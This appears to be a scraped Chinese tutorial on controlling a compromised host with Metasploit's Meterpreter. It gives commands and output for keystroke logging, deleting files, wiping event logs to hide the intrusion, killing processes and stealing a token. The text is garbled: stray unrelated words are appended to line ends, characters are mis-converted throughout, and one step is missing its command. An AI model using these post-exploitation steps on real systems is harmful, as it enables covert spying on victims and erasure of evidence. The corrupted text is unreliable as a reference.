Kali-linux控制Meterpreter

Meterpreter是Metasploit框架中的一個殺手鐗,一般做爲利用漏洞後的攻擊載荷所使用,攻擊載荷在觸發漏洞後可以返回給用戶一個控制通道。當使用Armitage、MSFCLI或MSFCONSOLE獲取到目標系統上的一個Meterpreter鏈接時,用戶必須使用Meterpreter傳遞攻擊載荷。MSFCONSOLE用於管理用戶的會話,而Meterpreter則是攻擊載荷和滲透攻擊交互。本節將介紹Meterpreter的使用。shell

Meterpreter包括的一些常見命令以下所示。session

  • help:查看幫助信息。
  • background:容許用戶在後臺Meterpreter會話。
  • download:容許用戶從入侵主機上下載文件。
  • upload:容許用戶上傳文件到入侵主機。
  • execute:容許用戶在入侵主機上執行命令。
  • shell:容許用戶在入侵主機上(僅是Windows主機)運行Windows shell命令。
  • session -i:容許用戶切換會話。

經過打開MSFCONSOLE實現控制。具體操做步驟以下所示。架構

(1)在MSFCONSOLE上啓動一個活躍的會話。框架

(2)經過利用系統的用戶啓動登陸鍵盤輸入。執行命令以下所示:post

meterpreter > keyscan_start
Starting the keystroke sniffer…

從輸出的信息中能夠看到鍵盤輸入嗅探已啓動。日誌

(3)捕獲漏洞系統用戶的鍵盤輸入。執行命令以下所示:code

meterpreter > keyscan_dump
Dumping captured keystrokes…
<Return> www.baidu.com <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>

以上輸出的信息表示在漏洞系統中用戶輸入了www.baidu.com,aaaa及回車鍵、退出鍵。blog

(4)中止捕獲漏洞系統用戶的鍵盤輸入。執行命令以下所示:token

meterpreter > keyscan_stop
Stopping the keystroke sniffer…

從輸出的信息中能夠看到鍵盤輸入嗅探已中止。進程

(5)刪除漏洞系統上的一個文件。執行命令以下所示:

meterpreter > del exploited.docx

(6)清除漏洞系統上的事件日誌。執行命令以下所示:

meterpreter > clearev
[*] Wiping 57 records from Application…
[*] Wiping 107 records from System…
[*] Wiping 0 records from Security…

(7)查看正在運行的進程列表。執行命令以下所示:

輸出的信息顯示了漏洞系統中正在運行的全部進程,包括進程的ID號、進程名、系統架構、用戶及運行程序的路徑等。

(8)使用kill殺死漏洞系統中指定的進程號。執行命令以下所示:

meterpreter > kill 2040
Killing: 2040

(9)嘗試從漏洞系統竊取一個假冒令牌。執行命令以下所示:

meterpreter > steal_token

注意:使用不一樣的模塊,Meterpreter中的命令是不一樣的。有些模塊中,可能不存在以上命令。

相關文章
相關標籤/搜索